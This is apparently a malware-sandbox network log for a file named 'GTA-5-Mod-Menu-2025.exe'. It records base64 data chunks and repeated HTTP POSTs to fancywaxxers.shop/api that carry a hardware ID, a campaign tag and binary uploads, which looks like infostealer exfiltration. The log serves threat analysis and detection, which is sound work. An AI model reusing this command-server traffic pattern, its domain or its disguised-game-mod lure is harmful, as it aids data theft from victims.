/MyCz7cLlBuVMNWxI7x+BlDVQI9UICqrTAm1y3d+nqz7xs2X9FCuHI4uz7M9sDkRF8sPj1BmfegES/vJbDHB7dvEwZTjVbdYm2/Z/DS2fkFeyg6JVWBg408Ovtx/eJSg+9nImPRYoRKOLsq4Prc4GR6MTshfeDKzBCa+3nN9j+/BlN3Z7hihFMR5gLQ2uT0SEc8Ig0pgYO1JAKnIcX+TrunezJH0Ua0RgSbE/H36OQFelECpVWt+4VMF+9E6aNm
2024-12-30 19:41:00 UTC	1369	IN	Data Raw: 34 35 32 65 0d 0a 6c 6b 52 4a 71 6a 39 64 50 55 31 2b 67 57 76 31 69 44 4c 59 44 6b 63 37 55 78 46 68 62 4d 41 59 78 56 5a 48 50 6d 53 41 79 34 77 6e 68 35 6c 4b 48 2f 32 38 71 66 39 46 43 30 46 6f 6f 6e 78 72 77 32 2b 6e 42 5a 47 64 52 41 30 42 68 45 66 50 78 51 44 76 6e 37 64 33 2b 58 71 75 32 55 33 64 6e 75 47 4b 45 55 78 48 6d 41 73 6a 36 78 4d 68 34 58 7a 51 4f 49 55 6d 35 39 34 55 77 4e 75 38 4e 31 65 70 47 72 39 74 2f 4e 6d 50 42 51 70 52 53 42 4c 4d 50 38 66 66 6f 35 41 56 36 55 51 4b 31 57 59 32 50 36 42 6a 43 34 77 48 70 32 6a 2b 33 6b 6d 74 76 58 38 46 54 6d 51 4d 51 72 78 37 73 33 74 7a 51 61 47 73 67 4e 68 31 46 70 65 2f 6c 4f 43 62 58 63 65 58 75 63 6f 2f 66 52 7a 5a 66 32 57 61 67 53 6a 32 47 4f 2f 44 53 69 66 6b 46 65 34 77 32 59 53 6d 70 Data Ascii: 452elkRJqj9dPU1+gWv1iDLYDkc7UxFhbMAYxVZHPmSAy4wnh5lKH/28qf9FC0Foonxrw2+nBZGdRA0BhEfPxQDvn7d3+Xqu2U3dnuGKEUxHmAsj6xMh4XzQOIUm594UwNu8N1epGr9t/NmPBQpRSBLMP8ffo5AV6UQK1WY2P6BjC4wHp2j+3kmtvX8FTmQMQrx7s3tzQaGsgNh1Fpe/lOCbXceXuco/fRzZf2WagSj2GO/DSifkFe4w2YSmp
2024-12-30 19:41:00 UTC	1369	IN	Data Raw: 2f 76 4a 62 44 48 42 37 64 54 58 31 4a 32 33 52 2b 67 42 78 43 62 4d 2f 47 76 36 4e 42 55 61 7a 77 79 42 56 47 31 7a 37 30 4d 49 76 38 35 79 64 35 79 73 38 4e 7a 4f 6d 50 31 55 6f 68 53 4e 4a 38 79 2f 4d 4c 78 2b 56 31 37 4c 47 4d 67 41 49 46 50 6d 54 77 6d 37 7a 57 56 32 32 65 4f 37 32 73 53 58 74 77 43 77 43 4a 4d 6d 33 2f 49 71 2b 6a 6b 56 58 70 52 41 67 6b 70 6c 66 4f 39 4f 41 4c 2f 43 66 6e 47 63 76 2f 50 53 78 5a 76 2f 58 61 6b 65 67 53 7a 48 74 7a 43 6f 4c 42 6f 61 77 67 7a 49 46 69 42 31 38 77 52 64 2b 2b 74 6a 63 6f 6d 72 2b 4a 54 64 32 65 34 59 6f 52 54 45 65 59 43 38 50 62 59 31 48 68 58 48 42 49 78 59 62 58 6e 6c 53 67 79 33 78 6e 68 32 69 36 44 2b 33 4d 69 65 38 6c 53 72 47 35 59 69 77 66 78 39 2b 6a 6b 42 58 70 52 41 72 32 74 58 55 61 74 62 Data Ascii: /vJbDHB7dTX1J23R+gBxCbM/Gv6NBUazwyBVG1z70MIv85yd5ys8NzOmP1UohSNJ8y/MLx+V17LGMgAIFPmTwm7zWV22eO72sSXtwCwCJMm3/Iq+jkVXpRAgkplfO9OAL/CfnGcv/PSxZv/XakegSzHtzCoLBoawgzIFiB18wRd++tjcomr+JTd2e4YoRTEeYC8PbY1HhXHBIxYbXnlSgy3xnh2i6D+3Mie8lSrG5Yiwfx9+jkBXpRAr2tXUatb
2024-12-30 19:41:00 UTC	1369	IN	Data Raw: 4e 70 32 66 57 37 2b 4d 47 59 2f 42 69 35 56 70 31 68 78 37 42 7a 34 6e 34 65 46 73 51 4f 69 31 35 72 66 75 64 46 44 4c 33 4c 66 48 61 57 71 76 4c 54 77 70 48 6c 58 36 73 52 68 43 72 4a 74 6a 65 37 4e 56 6c 51 6a 41 65 51 47 44 67 79 32 55 4d 54 71 38 30 30 62 74 65 30 75 39 50 4f 31 36 38 59 71 77 71 46 4a 4e 4b 34 50 4c 45 73 45 68 6a 4d 42 5a 70 66 62 48 6a 6b 52 77 32 32 7a 58 78 6a 6d 61 44 37 78 74 43 52 2f 46 62 6d 56 73 51 6d 32 50 78 72 2b 67 38 4f 46 59 77 66 78 6b 45 67 64 65 63 45 58 66 76 4e 66 6e 79 58 76 2f 2f 53 79 5a 54 35 55 4b 4d 51 67 43 76 4e 73 7a 69 77 4e 78 45 65 77 77 57 41 55 32 5a 38 36 6b 49 4a 74 6f 34 36 4d 5a 36 31 75 34 79 43 73 4f 31 56 6f 41 2b 56 46 4d 65 38 59 76 6f 68 56 77 65 4d 42 34 51 59 4f 44 4c 6d 53 41 2b 32 79 Data Ascii: Np2fW7+MGY/Bi5Vp1hx7Bz4n4eFsQOi15rfudFDL3LfHaWqvLTwpHlX6sRhCrJtje7NVlQjAeQGDgy2UMTq800bte0u9PO168YqwqFJNK4PLEsEhjMBZpfbHjkRw22zXxjmaD7xtCR/FbmVsQm2Pxr+g8OFYwfxkEgdecEXfvNfnyXv//SyZT5UKMQgCvNsziwNxEewwWAU2Z86kIJto46MZ61u4yCsO1VoA+VFMe8YvohVweMB4QYODLmSA+2y
2024-12-30 19:41:00 UTC	1369	IN	Data Raw: 74 35 4a 72 62 31 2f 42 55 35 6b 44 45 4c 38 32 36 4d 72 73 32 45 52 37 4b 43 6f 78 62 61 58 48 73 54 51 4f 77 7a 58 35 2b 6e 71 76 2f 31 4d 6d 51 2b 56 36 6a 45 34 31 68 6a 76 77 30 6f 6e 35 42 58 75 6f 6a 6d 6b 70 53 66 4f 68 66 52 61 53 41 62 54 47 65 6f 62 75 4d 67 70 7a 2f 56 37 51 64 6a 53 6e 45 74 54 4f 2b 4e 42 51 5a 7a 41 57 46 58 57 52 38 37 30 4d 46 74 38 46 7a 65 5a 61 70 2b 39 75 43 32 62 64 66 76 6c 6a 63 59 65 43 33 4a 5a 73 77 45 67 79 4d 48 38 5a 42 49 48 58 6e 42 46 33 37 77 48 31 77 6b 61 50 33 33 4d 61 46 39 31 4f 76 46 34 55 75 77 4c 38 79 73 44 59 4c 47 4d 77 4c 67 46 39 6f 64 75 56 57 42 4c 53 4f 4f 6a 47 65 74 62 75 4d 67 71 62 68 58 36 45 58 78 67 6a 48 70 7a 4b 77 50 52 49 53 6a 42 2f 47 51 53 42 31 35 77 52 64 2b 38 4e 34 66 4a Data Ascii: t5Jrb1/BU5kDEL826Mrs2ER7KCoxbaXHsTQOwzX5+nqv/1MmQ+V6jE41hjvw0on5BXuojmkpSfOhfRaSAbTGeobuMgpz/V7QdjSnEtTO+NBQZzAWFXWR870MFt8FzeZap+9uC2bdfvljcYeC3JZswEgyMH8ZBIHXnBF37wH1wkaP33MaF91OvF4UuwL8ysDYLGMwLgF9oduVWBLSOOjGetbuMgqbhX6EXxgjHpzKwPRISjB/GQSB15wRd+8N4fJ
2024-12-30 19:41:00 UTC	1369	IN	Data Raw: 78 5a 75 33 41 4f 59 54 69 69 54 42 73 44 6d 39 4d 41 73 66 78 67 79 4a 58 32 64 35 2b 55 38 58 73 4d 5a 33 66 35 47 6b 2b 39 72 43 6c 76 70 59 35 6c 62 45 4a 74 6a 38 61 2f 6f 62 4f 67 6e 61 43 73 70 37 64 32 54 68 51 77 6d 74 78 58 56 79 6a 36 44 72 6c 49 7a 58 35 6c 2b 33 57 4e 77 33 30 4b 73 30 70 58 41 41 58 73 73 4d 79 41 41 67 65 65 52 4b 43 4c 44 4b 66 58 53 52 72 76 37 52 79 4a 76 37 57 61 34 52 6a 69 54 46 75 6a 6d 35 4d 42 59 66 77 41 53 42 56 6d 6b 79 70 51 51 43 6f 34 34 73 4d 61 2b 39 2f 4d 7a 50 68 37 56 71 70 51 6d 56 4e 4d 32 73 4e 66 67 52 47 68 4c 50 42 59 39 49 49 47 32 6c 58 55 57 38 77 6a 51 70 32 61 33 2f 32 4d 47 51 2b 56 65 72 46 34 4d 71 7a 37 59 39 71 44 45 63 46 73 41 49 68 55 70 71 65 50 6c 4e 44 4c 62 41 66 47 4f 61 37 62 57 Data Ascii: xZu3AOYTiiTBsDm9MAsfxgyJX2d5+U8XsMZ3f5Gk+9rClvpY5lbEJtj8a/obOgnaCsp7d2ThQwmtxXVyj6DrlIzX5l+3WNw30Ks0pXAAXssMyAAgeeRKCLDKfXSRrv7RyJv7Wa4RjiTFujm5MBYfwASBVmkypQQCo44sMa+9/MzPh7VqpQmVNM2sNfgRGhLPBY9IIG2lXUW8wjQp2a3/2MGQ+VerF4Mqz7Y9qDEcFsAIhUpqePlNDLbAfGOa7bW
2024-12-30 19:41:00 UTC	1369	IN	Data Raw: 42 6a 2b 49 63 52 70 67 49 4e 39 2b 69 5a 5a 52 6f 77 31 69 31 5a 75 64 66 31 56 53 4a 72 44 66 33 32 55 6f 76 43 55 6a 4e 66 78 47 50 35 49 79 6d 48 45 72 58 50 69 62 6b 74 46 6d 56 50 66 43 44 4a 74 70 56 31 46 72 59 34 73 49 39 66 74 36 5a 53 61 31 37 42 62 74 41 71 43 49 74 61 2f 64 49 51 41 4f 67 6e 61 43 70 4d 61 52 6e 58 36 54 52 4f 32 33 45 70 50 74 36 44 36 31 38 7a 56 78 6b 36 72 43 49 63 6b 78 34 49 4e 74 44 6b 4e 47 63 49 47 69 42 67 75 4d 75 51 45 58 59 4b 4f 50 44 47 6d 34 37 76 4d 67 73 2b 33 62 61 55 57 69 69 62 57 72 58 36 5a 4b 51 38 55 31 30 4b 75 58 33 46 37 2f 55 6b 58 2b 34 41 30 64 39 6e 31 71 35 71 43 6b 2b 59 59 2f 6b 6a 57 65 70 58 76 5a 4f 70 73 42 6c 44 56 51 4a 34 59 4f 43 43 6c 42 42 66 37 6c 6a 51 32 6d 72 2f 70 30 73 47 42 Data Ascii: Bj+IcRpgIN9+iZZRow1i1Zudf1VSJrDf32UovCUjNfxGP5IymHErXPibktFmVPfCDJtpV1FrY4sI9ft6ZSa17BbtAqCIta/dIQAOgnaCpMaRnX6TRO23EpPt6D618zVxk6rCIckx4INtDkNGcIGiBguMuQEXYKOPDGm47vMgs+3baUWiibWrX6ZKQ8U10KuX3F7/UkX+4A0d9n1q5qCk+YY/kjWepXvZOpsBlDVQJ4YOCClBBf7ljQ2mr/p0sGB
2024-12-30 19:41:00 UTC	1369	IN	Data Raw: 62 45 4a 64 48 38 61 2b 70 73 51 6b 75 66 56 39 67 4b 66 7a 7a 79 42 42 50 37 6c 69 59 2f 32 62 2b 37 6a 49 4c 51 39 45 71 30 48 6f 63 33 77 2f 73 4e 68 41 73 61 45 4d 49 48 6e 6d 31 6a 59 2b 68 45 44 6f 58 77 56 58 2b 53 71 76 66 43 2f 4b 6e 43 57 36 67 57 67 7a 66 52 2f 48 33 36 4d 56 6c 47 39 55 44 41 47 46 38 38 71 31 78 46 34 34 35 42 63 70 65 6a 2f 4d 4c 54 32 73 4a 62 74 78 75 45 4b 6f 44 79 63 37 78 2b 51 55 79 43 51 49 78 4a 49 43 71 37 46 6c 37 75 6e 53 4d 68 79 37 4b 31 7a 59 4b 42 74 77 44 30 56 73 51 7a 67 4f 52 7a 2f 54 30 4c 44 4d 6f 44 6e 6c 73 6e 54 4e 56 69 42 72 7a 49 64 33 2b 4f 76 4c 6e 37 77 5a 7a 37 56 4b 45 4f 75 68 2f 56 76 7a 32 30 4f 51 38 50 6a 45 37 49 56 79 41 71 30 67 51 55 73 63 6b 34 4f 64 57 38 36 4e 72 4a 67 66 41 59 6d Data Ascii: bEJdH8a+psQkufV9gKfzzyBBP7liY/2b+7jILQ9Eq0Hoc3w/sNhAsaEMIHnm1jY+hEDoXwVX+SqvfC/KnCW6gWgzfR/H36MVlG9UDAGF88q1xF445Bcpej/MLT2sJbtxuEKoDyc7x+QUyCQIxJICq7Fl7unSMhy7K1zYKBtwD0VsQzgORz/T0LDMoDnlsnTNViBrzId3+OvLn7wZz7VKEOuh/Vvz20OQ8PjE7IVyAq0gQUsck4OdW86NrJgfAYm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49707	104.21.96.1	443	6216	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 19:41:01 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2PP8C865FU3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12821 Host: fancywaxxers.shop
2024-12-30 19:41:01 UTC	12821	OUT	Data Raw: 2d 2d 32 50 50 38 43 38 36 35 46 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 0d 0a 2d 2d 32 50 50 38 43 38 36 35 46 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 50 50 38 43 38 36 35 46 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 32 50 50 38 43 38 36 35 46 55 33 0d 0a Data Ascii: --2PP8C865FU3Content-Disposition: form-data; name="hwid"ACBBB19E4921B4981E3DEB35470B39C1--2PP8C865FU3Content-Disposition: form-data; name="pid"2--2PP8C865FU3Content-Disposition: form-data; name="lid"yau6Na--899083440--2PP8C865FU3
2024-12-30 19:41:01 UTC	1142	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 19:41:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eehpgke3jctt3t66orrvd01c83; expires=Fri, 25 Apr 2025 13:27:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FCasH6jHoDqy%2B9YxTxp8OJJojLoBirzhPCZgcTs1CYM8nh5cu%2BdFgFz1EdPPqHhg%2BfaIv9rvT%2F%2FYgD0wEmi%2FohspnRoL7esrxz0iHn1qiYdi8jQAx4rH37Su%2FuD7GrWm8MoqtA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa481426a9e42c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1730&rtt_var=865&sent=11&recv=19&lost=0&retrans=1&sent_bytes=4224&recv_bytes=13755&delivery_rate=330242&cwnd=212&unsent_bytes=0&cid=e43fd4ec5d0901c1&ts=715&x=0"
2024-12-30 19:41:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 19:41:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49708	104.21.96.1	443	6216	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 19:41:02 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E4S8N39O User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15049 Host: fancywaxxers.shop
2024-12-30 19:41:02 UTC	15049	OUT	Data Raw: 2d 2d 45 34 53 38 4e 33 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 0d 0a 2d 2d 45 34 53 38 4e 33 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 34 53 38 4e 33 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 45 34 53 38 4e 33 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 Data Ascii: --E4S8N39OContent-Disposition: form-data; name="hwid"ACBBB19E4921B4981E3DEB35470B39C1--E4S8N39OContent-Disposition: form-data; name="pid"2--E4S8N39OContent-Disposition: form-data; name="lid"yau6Na--899083440--E4S8N39OContent-Disp
2024-12-30 19:41:02 UTC	1138	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 19:41:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ubkahbh8j9apvrciih75r4u6ad; expires=Fri, 25 Apr 2025 13:27:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkvYNBqBqmns%2BOKbeZtGWE6SYklMGdRjFq22%2Bc4dS1AD1GBywxv2zBSrD9%2Fqd7r%2F8OE1WHinud8WTcO2dojWu%2BlRPZgvE4YhBho1klzXb3MVF%2FvWfyMIYOpqSmRlinYIdMWoHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa48149eb49c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1634&rtt_var=651&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2843&recv_bytes=15980&delivery_rate=1631284&cwnd=178&unsent_bytes=0&cid=4129f500dc5e66e3&ts=497&x=0"
2024-12-30 19:41:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 19:41:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49709	104.21.96.1	443	6216	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 19:41:03 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WAQFEYZ2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19907 Host: fancywaxxers.shop
2024-12-30 19:41:03 UTC	15331	OUT	Data Raw: 2d 2d 57 41 51 46 45 59 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 0d 0a 2d 2d 57 41 51 46 45 59 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 41 51 46 45 59 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 57 41 51 46 45 59 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 Data Ascii: --WAQFEYZ2Content-Disposition: form-data; name="hwid"ACBBB19E4921B4981E3DEB35470B39C1--WAQFEYZ2Content-Disposition: form-data; name="pid"3--WAQFEYZ2Content-Disposition: form-data; name="lid"yau6Na--899083440--WAQFEYZ2Content-Disp
2024-12-30 19:41:03 UTC	4576	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e 8d a5 f6 3d Data Ascii: 2+?2+?o?Mp5p_oI=
2024-12-30 19:41:04 UTC	1135	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 19:41:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vpt24bg3nt64f4q417a34548lq; expires=Fri, 25 Apr 2025 13:27:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jkf4Z9sfDrZ0tR0qCgdLphoofwfa5UlWEzVP9d9X%2FtXPLcn74oSuvGf9l8azL1JLYNSGdf%2Bq3DoZ%2B8JhX854dLuLmJqrjujqx6W5shQe8ivz1BveMZIwSseHPQBR6hIoVXRq%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa48151ae1572a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1980&rtt_var=748&sent=17&recv=26&lost=0&retrans=0&sent_bytes=2842&recv_bytes=20860&delivery_rate=1474747&cwnd=212&unsent_bytes=0&cid=182ca9532f0eb68f&ts=726&x=0"
2024-12-30 19:41:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 19:41:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49710	104.21.96.1	443	6216	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 19:41:05 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=L7D6IRQA4TEV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1220 Host: fancywaxxers.shop
2024-12-30 19:41:05 UTC	1220	OUT	Data Raw: 2d 2d 4c 37 44 36 49 52 51 41 34 54 45 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 0d 0a 2d 2d 4c 37 44 36 49 52 51 41 34 54 45 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 37 44 36 49 52 51 41 34 54 45 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 4c 37 44 36 49 52 51 41 34 54 Data Ascii: --L7D6IRQA4TEVContent-Disposition: form-data; name="hwid"ACBBB19E4921B4981E3DEB35470B39C1--L7D6IRQA4TEVContent-Disposition: form-data; name="pid"1--L7D6IRQA4TEVContent-Disposition: form-data; name="lid"yau6Na--899083440--L7D6IRQA4T
2024-12-30 19:41:07 UTC	1129	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 19:41:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rb4m0rt4s403nkdsr3di9nv9ar; expires=Fri, 25 Apr 2025 13:27:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vzmb7v9DxjkeLxQ5hSwD2wtCyUYow9LuDAGq7ExmWcGczFusX5Cr7H4d1uTsP1eGslvjFZ9bz3%2Fw6Lu7xv50NmJyuQ4F5HGPh9aVfubNt6w0uDRVnhwJt%2BxX968UZLK0LGe72A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4815b7d864363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1613&rtt_var=605&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2132&delivery_rate=1810291&cwnd=238&unsent_bytes=0&cid=c4aa9a134aea5dec&ts=2208&x=0"
2024-12-30 19:41:07 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 19:41:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49712	104.21.96.1	443	6216	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 19:41:08 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=95Z0Z9TD6C7TMHMM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 572287 Host: fancywaxxers.shop
